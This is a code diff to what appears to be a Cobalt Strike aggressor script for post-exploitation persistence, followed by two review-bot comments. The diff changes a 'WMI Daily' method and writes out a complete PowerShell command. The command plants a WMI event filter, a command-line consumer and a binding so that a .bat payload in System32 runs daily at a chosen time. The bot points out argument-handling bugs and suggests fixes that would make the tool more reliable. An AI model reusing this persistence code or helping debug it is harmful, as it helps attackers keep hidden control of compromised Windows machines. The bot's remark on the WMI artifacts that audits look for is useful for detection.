diff --git a/persistence.cna b/persistence.cna
index ac787d9..13cd148 100644
--- a/persistence.cna
+++ b/persistence.cna
@@ -434,24 +434,22 @@ sub remWMIOnStart {
 sub addWMIDaily {
 if (isAdmin($1)){
 if ($5) {
- $payloadName = $5;
- $taskName = $5;
+ if($6) {
+ $taskHour = $5;
+ $taskMinute = $6;
+ }
+ else {
+ berror($1, "Specify Hour, Minute");
+ }
+ }
+ if ($7) {
+ $payloadName = $7;
+ $taskName = $7;
 }
 else {
 $payloadName = "Updater";
 $taskName = "Updater";
 }
- if ($6) {
- if($7) {
- $taskHour = $6;
- $taskMinute = $7;
- }
- }
- else {
- $taskHour = 13;
- $taskMinute = 00;
- }
-
 $payloadPath = "C:\\Windows\\System32\\" . $payloadName . ".bat";
 $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour ='" . $taskHour ."' AND TargetInstance.Minute ='" . $taskMinute . "' GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
@@ -583,7 +581,7 @@ Available methods:
 *SchTasks OnStart
 *SchTasks OnLogon
 *WMI OnStart
- *WMI Daily
+ *WMI Daily [Hour] [Minute]
 **linkinfo
 *StickyKeys
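Review bot: The new `else` branch in `addWMIDaily` reports `berror($1, "Specify Hour, Minute");` but does not stop, and the removed `$taskHour = 13; $taskMinute = 00;` defaults have no replacement, so with `$5` or `$6` missing the `$powershellcmd` string below is still built with `$taskHour`/`$taskMinute` unset, or holding values from an earlier call if they are not scoped locally. Add `return;` after the `berror` call and either restore the defaults in an `else` of `if ($5)` or reject the call when no time is given. If Sleep evaluates `0` as false, hour 0 and minute 0 also fail these checks, so testing against `$null` would be safer. The body of `addWMIDaily` continues past the end of the hunk, so whether the command is actually dispatched after the error cannot be seen here. For anyone reading this as a detection reference, the three `Set-WmiInstance` calls leave an `__EventFilter`, a `CommandLineEventConsumer` and a `__FilterToConsumerBinding` in `root\subscription`, which is where WMI-persistence audits look.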
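Review bot: The usage line `*WMI Daily [Hour] [Minute]` omits the optional third argument that the first hunk reads from `$7` as the payload and task name; `*WMI Daily [Hour] [Minute] [Name]` would match the code. The position of the name also moved from `$5` to `$7`, so, assuming arguments are passed through in order, an existing invocation that gives a name first would now have it read as the hour.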